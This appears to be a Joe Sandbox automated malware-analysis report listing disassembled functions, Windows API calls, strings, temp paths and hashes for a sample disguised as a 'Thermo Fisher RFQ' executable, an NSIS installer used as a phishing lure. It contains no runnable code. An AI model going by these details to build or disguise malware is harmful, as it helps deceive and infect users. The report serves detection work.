Associated: 00000000.00000002.87353631384.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353695868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87354320706.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Thermo Fisher RFQ_TFS-1207.jbxd

Similarity

API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
String ID: "C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft$;$;
API String ID: 2803837635-2237357579
Opcode ID: a0dd9f8ef326ba969c16cb1fd88c965c76ed405712e773b35a873600aa04ef71
Instruction ID: 049f7c6d5ff3921a21710fe3aab5a9d19a74ce2d4ccd47fede02a431b1dffc51
Opcode Fuzzy Hash: a0dd9f8ef326ba969c16cb1fd88c965c76ed405712e773b35a873600aa04ef71
Instruction Fuzzy Hash: A4519F71901204AFDF209FA5DD86BAE7EACAB45356F20817BF500B62D1CA7C9E408B5D

Function 00406591 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 204
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 004066B3
GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsk4CBF.tmp\System.dll,?,?,00000000,00000000,0079A700,75F023A0), ref: 004066C9
SHGetPathFromIDListW.SHELL32(00000000,Call), ref: 00406727
CoTaskMemFree.OLE32(00000000,?,00000000,00000007), ref: 00406730
lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsk4CBF.tmp\System.dll,?,?,00000000,00000000,0079A700,75F023A0), ref: 0040675B
lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsk4CBF.tmp\System.dll,?,?,00000000,00000000,0079A700,75F023A0), ref: 004067B5

Strings

Software\Microsoft\Windows\CurrentVersion, xrefs: 00406684
Call, xrefs: 004065BE, 00406678, 0040667F, 00406683, 0040669C, 0040669D, 004066B2, 004066C8, 004066F9, 00406725, 0040675A, 00406760, 0040677D, 00406790, 004067AE, 004067B4, 004067BD, 004067F2
\Microsoft\Internet Explorer\Quick Launch, xrefs: 00406755
Skipped: C:\Users\user\AppData\Local\Temp\nsk4CBF.tmp\System.dll, xrefs: 004065B5

Memory Dump Source

Source File: 00000000.00000002.87353660468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.87353631384.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353695868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87354320706.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Thermo Fisher RFQ_TFS-1207.jbxd

Similarity

API ID: Directory$FreeFromListPathSystemTaskWindowslstrcatlstrlen
String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nsk4CBF.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 4024019347-4058228671
Opcode ID: fb78c655de7e04e2c0873077e29524e20483bf8d3f5bca8374ab451ad378ea15
Instruction ID: 996034b20cbe1ccfc182dbfd15fdcef075a6e82f48079f00531b92f4adf5a68d
Opcode Fuzzy Hash: fb78c655de7e04e2c0873077e29524e20483bf8d3f5bca8374ab451ad378ea15
Instruction Fuzzy Hash: D56135716046119BD720AF24DD84B7B77E4AB85318F25063FF687B32D0DA3C8961865E

Function 00401794 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 145
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrcatW.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Local\Temp\bygvrkerne\linda\balaamitical\Surfboards,?,?,00000031), ref: 004017D5
CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Local\Temp\bygvrkerne\linda\balaamitical\Surfboards,?,?,00000031), ref: 004017FA

Part of subcall function 00406554: lstrcpynW.KERNEL32(?,?,00000400,004036A1,007A7260,NSIS Error,?,?,0000000A,?), ref: 00406561

Part of subcall function 004055D9: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsk4CBF.tmp\System.dll,00000000,0079A700,75F023A0,?,?,?,?,?,?,?,?,?,0040341A,00000000,?), ref: 00405611
Part of subcall function 004055D9: lstrlenW.KERNEL32(0040341A,Skipped: C:\Users\user\AppData\Local\Temp\nsk4CBF.tmp\System.dll,00000000,0079A700,75F023A0,?,?,?,?,?,?,?,?,?,0040341A,00000000), ref: 00405621
Part of subcall function 004055D9: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsk4CBF.tmp\System.dll,0040341A,0040341A,Skipped: C:\Users\user\AppData\Local\Temp\nsk4CBF.tmp\System.dll,00000000,0079A700,75F023A0), ref: 00405634
Part of subcall function 004055D9: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsk4CBF.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsk4CBF.tmp\System.dll), ref: 00405646
Part of subcall function 004055D9: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040566C
Part of subcall function 004055D9: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405686
Part of subcall function 004055D9: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405694

Strings

C:\Users\user\AppData\Local\Temp\bygvrkerne\linda\balaamitical\Surfboards, xrefs: 004017C3
Call, xrefs: 004017B2, 004017BB, 004017C8, 004017DA, 004017E6, 0040181C, 00401832, 00401850, 0040188C, 0040190D, 00401916, 00401920, 0040192B
C:\Users\user\AppData\Local\Temp\nsk4CBF.tmp, xrefs: 00401846, 00401864
C:\Users\user\AppData\Local\Temp\nsk4CBF.tmp\System.dll, xrefs: 0040185A, 00401876

Memory Dump Source

Source File: 00000000.00000002.87353660468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.87353631384.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353695868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87354320706.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Thermo Fisher RFQ_TFS-1207.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID: C:\Users\user\AppData\Local\Temp\bygvrkerne\linda\balaamitical\Surfboards$C:\Users\user\AppData\Local\Temp\nsk4CBF.tmp$C:\Users\user\AppData\Local\Temp\nsk4CBF.tmp\System.dll$Call
API String ID: 1941528284-2595573383
Opcode ID: a2c4ba2b1575994442f4eda3782f903add88faf4951f8c682e70490475c3a32a
Instruction ID: 1e9ca80c6a5dacc7cd580e770cf15d3f22a044297d5b9cee136244b7a600bee5
Opcode Fuzzy Hash: a2c4ba2b1575994442f4eda3782f903add88faf4951f8c682e70490475c3a32a
Instruction Fuzzy Hash: C441E871400104BADF11BBB5DD85DBE3AB5EF45329B21823FF012B10E1DB3C8A91966D

Function 004055D9 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72
stringwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsk4CBF.tmp\System.dll,00000000,0079A700,75F023A0,?,?,?,?,?,?,?,?,?,0040341A,00000000,?), ref: 00405611
lstrlenW.KERNEL32(0040341A,Skipped: C:\Users\user\AppData\Local\Temp\nsk4CBF.tmp\System.dll,00000000,0079A700,75F023A0,?,?,?,?,?,?,?,?,?,0040341A,00000000), ref: 00405621
lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsk4CBF.tmp\System.dll,0040341A,0040341A,Skipped: C:\Users\user\AppData\Local\Temp\nsk4CBF.tmp\System.dll,00000000,0079A700,75F023A0), ref: 00405634
SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsk4CBF.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsk4CBF.tmp\System.dll), ref: 00405646
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040566C
SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405686
SendMessageW.USER32(?,00001013,?,00000000), ref: 00405694

Strings

Skipped: C:\Users\user\AppData\Local\Temp\nsk4CBF.tmp\System.dll, xrefs: 004055FA, 0040560A, 00405610, 00405633, 0040563F

Memory Dump Source

Source File: 00000000.00000002.87353660468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.87353631384.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353695868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87354320706.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Thermo Fisher RFQ_TFS-1207.jbxd

Similarity

API ID: MessageSend$lstrlen$TextWindowlstrcat
String ID: Skipped: C:\Users\user\AppData\Local\Temp\nsk4CBF.tmp\System.dll
API String ID: 2531174081-1402984587
Opcode ID: da048427165e3fda7d212e1d25adb62017d163fe0601bf1cc7e6f9066e197b12
Instruction ID: 329114e2e26f34c588cdeed9baab55c5e37b8eaf8a8cec26a94c2fb3a39dc2c1
Opcode Fuzzy Hash: da048427165e3fda7d212e1d25adb62017d163fe0601bf1cc7e6f9066e197b12
Instruction Fuzzy Hash: F921B371900618BACF119F65DD449CFBFB8EF95364F10843AF908B22A0C77A4A50CFA8

Function 004032D9 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 161
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00403343
GetTickCount.KERNEL32 ref: 004033C7
MulDiv.KERNEL32(7FFFFFFF,?,?), ref: 004033F0
wsprintfW.USER32 ref: 00403403

Strings

STy, xrefs: 0040338D, 0040339F
... %d%%, xrefs: 004033FD

Memory Dump Source

Source File: 00000000.00000002.87353660468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.87353631384.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353695868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87354320706.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Thermo Fisher RFQ_TFS-1207.jbxd

Similarity

API ID: CountTick$wsprintf
String ID: ... %d%%$STy
API String ID: 551687249-2882605797
Opcode ID: 35df2eeb44d66dae63b1d0c24c026509dc1c2a142cef09f029ae2f44a6fc0423
Instruction ID: eb1ee041d621481d77111d3da967b5f6536357fdff7ba477760ccc35d22143eb
Opcode Fuzzy Hash: 35df2eeb44d66dae63b1d0c24c026509dc1c2a142cef09f029ae2f44a6fc0423
Instruction Fuzzy Hash: FD515F71910219EBCF11CF65DA8469E7FA8AB00756F14417BE804BA2C1C7789B41CBAA

Function 00402711 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadFile.KERNELBASE(?,?,?,?), ref: 0040277D
MultiByteToWideChar.KERNEL32(?,?,?,?,?,00000001), ref: 004027B8
SetFilePointer.KERNELBASE(?,?,?,00000001,?,?,?,?,?,00000001), ref: 004027DB
MultiByteToWideChar.KERNEL32(?,?,?,00000000,?,00000001,?,00000001,?,?,?,?,?,00000001), ref: 004027F1

Part of subcall function 00406125: SetFilePointer.KERNEL32(?,00000000,00000000,00000001,00000000,?,?,?,004026F6,00000000,00000000,?,00000000,00000011), ref: 0040613B

SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 0040289D

Strings

9, xrefs: 00402760

Memory Dump Source

Source File: 00000000.00000002.87353660468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.87353631384.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353695868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87354320706.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Thermo Fisher RFQ_TFS-1207.jbxd

Similarity

API ID: File$Pointer$ByteCharMultiWide$Read
String ID: 9
API String ID: 163830602-2366072709
Opcode ID: 233c6f879122765c140ec07ecab3eee11d9f6e18c011ef8f82b6bc4890f14a46
Instruction ID: 94532b36e9b1b55a0417b46d3f551769048a354c57792839695d4204f468be83
Opcode Fuzzy Hash: 233c6f879122765c140ec07ecab3eee11d9f6e18c011ef8f82b6bc4890f14a46
Instruction Fuzzy Hash: D6510C75D04119AADF20EFD4CA84AAEBBB9FF44304F14817BE541B62D0D7B89D82CB58

Function 004068D8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 36
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068EF
wsprintfW.USER32 ref: 0040692A
LoadLibraryExW.KERNEL32(?,00000000,?), ref: 0040693E

Strings

%s%S.dll, xrefs: 00406924
UXTHEME, xrefs: 004068E1

Memory Dump Source

Source File: 00000000.00000002.87353660468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.87353631384.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353695868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87354320706.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Thermo Fisher RFQ_TFS-1207.jbxd

Similarity

API ID: DirectoryLibraryLoadSystemwsprintf
String ID: %s%S.dll$UXTHEME
API String ID: 2200240437-1106614640
Opcode ID: 7a73cbb44207cafadb11ab8eaaa41fd963bfa172cfc882b2dd9c54e233860d96
Instruction ID: 3d91c3bba12f32b4d8e24f08bfb099957206232b6387f0edcfac50a9fed73821
Opcode Fuzzy Hash: 7a73cbb44207cafadb11ab8eaaa41fd963bfa172cfc882b2dd9c54e233860d96
Instruction Fuzzy Hash: 80F0F671501219ABDB20BB68DD0EF9B376CAB00304F10447AA546F10E0EB789B69CB98

Function 6FE71817 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 120
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 6FE71BFF: GlobalFree.KERNEL32(?), ref: 6FE71E74
Part of subcall function 6FE71BFF: GlobalFree.KERNEL32(?), ref: 6FE71E79
Part of subcall function 6FE71BFF: GlobalFree.KERNEL32(?), ref: 6FE71E7E

GlobalFree.KERNEL32(00000000), ref: 6FE718C5
FreeLibrary.KERNEL32(?), ref: 6FE7194B
GlobalFree.KERNEL32(00000000), ref: 6FE71970

Part of subcall function 6FE7243E: GlobalAlloc.KERNEL32(?,?), ref: 6FE7246F

Part of subcall function 6FE72810: GlobalAlloc.KERNEL32(?,00000000,?,?,00000000,?,?,?,6FE71896,00000000), ref: 6FE728E0

Part of subcall function 6FE71666: wsprintfW.USER32 ref: 6FE71694

Strings

, xrefs: 6FE71951

Memory Dump Source

Source File: 00000000.00000002.87376840731.000000006FE71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FE70000, based on PE: true

Associated: 00000000.00000002.87376762635.000000006FE70000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.87376915461.000000006FE74000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.87376990254.000000006FE76000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6fe70000_Thermo Fisher RFQ_TFS-1207.jbxd

Similarity

API ID: Global$Free$Alloc$Librarywsprintf
String ID:
API String ID: 3962662361-3916222277
Opcode ID: fb37fe3cd0158646ccaa4aa5f4a273c045e5d3a0759eb33e4a8a894ff913a92c
Instruction ID: e462397ba08299e837d55f8185e480023b169b366e77ab6549465ad5e67ac609
Opcode Fuzzy Hash: fb37fe3cd0158646ccaa4aa5f4a273c045e5d3a0759eb33e4a8a894ff913a92c
Instruction Fuzzy Hash: 9541A0718003419AEB209FB4D894BD67FA8BF0635CF24446AE9549A1DADF7CA085DB60

Function 004024AF Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64
registrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsk4CBF.tmp,00000023,?,00000000,00000002,00000011,00000002), ref: 004024FA
RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsk4CBF.tmp,00000000,?,00000000,00000002,00000011,00000002), ref: 0040253A
RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsk4CBF.tmp,00000000,?,00000000,00000002,00000011,00000002), ref: 00402622

Strings

C:\Users\user\AppData\Local\Temp\nsk4CBF.tmp, xrefs: 004024EB, 004024F9, 00402510, 00402524, 0040252F

Memory Dump Source

Source File: 00000000.00000002.87353660468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.87353631384.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353695868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87354320706.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Thermo Fisher RFQ_TFS-1207.jbxd

Similarity

API ID: CloseValuelstrlen
String ID: C:\Users\user\AppData\Local\Temp\nsk4CBF.tmp
API String ID: 2655323295-1169235787
Opcode ID: 1f98af66c98e622ea097f2737b7b91c500bbd897f6573687ec4a0a2fb9e2066a
Instruction ID: b5124b365774ee0dd77fffeda1a995c18ababb59e8a55150708f98195cc7d2d6
Opcode Fuzzy Hash: 1f98af66c98e622ea097f2737b7b91c500bbd897f6573687ec4a0a2fb9e2066a
Instruction Fuzzy Hash: B8117231D00114BEDB01EFA59E59AAEB6B4EF54358F20443FF504B61D1C7B88E40966C

Function 00406073 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00406091
GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,0040352D,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403819), ref: 004060AC

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00406078
nsa, xrefs: 00406080

Memory Dump Source

Source File: 00000000.00000002.87353660468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.87353631384.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353695868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87354320706.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Thermo Fisher RFQ_TFS-1207.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: C:\Users\user\AppData\Local\Temp\$nsa
API String ID: 1716503409-944333549
Opcode ID: 017de5c5da22b1c6cf72d7a8a287ef2c48f88e3ac937424cf3c6df762bd8e462
Instruction ID: 3a9c7f2d553a521e2ba94e631897efa79da28a954d47360b9b57a106d7dab247
Opcode Fuzzy Hash: 017de5c5da22b1c6cf72d7a8a287ef2c48f88e3ac937424cf3c6df762bd8e462
Instruction Fuzzy Hash: 83F09076B40204BFEB00CF69ED05F9EB7ACEB95750F11803AED05F7180E6B099548768

Function 004015E6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

Part of subcall function 00405ECE: CharNextW.USER32(?,?,007A3F50,?,00405F42,007A3F50,007A3F50,75F03420,?,C:\Users\user\AppData\Local\Temp\,00405C80,?,75F03420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exe"), ref: 00405EDC
Part of subcall function 00405ECE: CharNextW.USER32(00000000), ref: 00405EE1
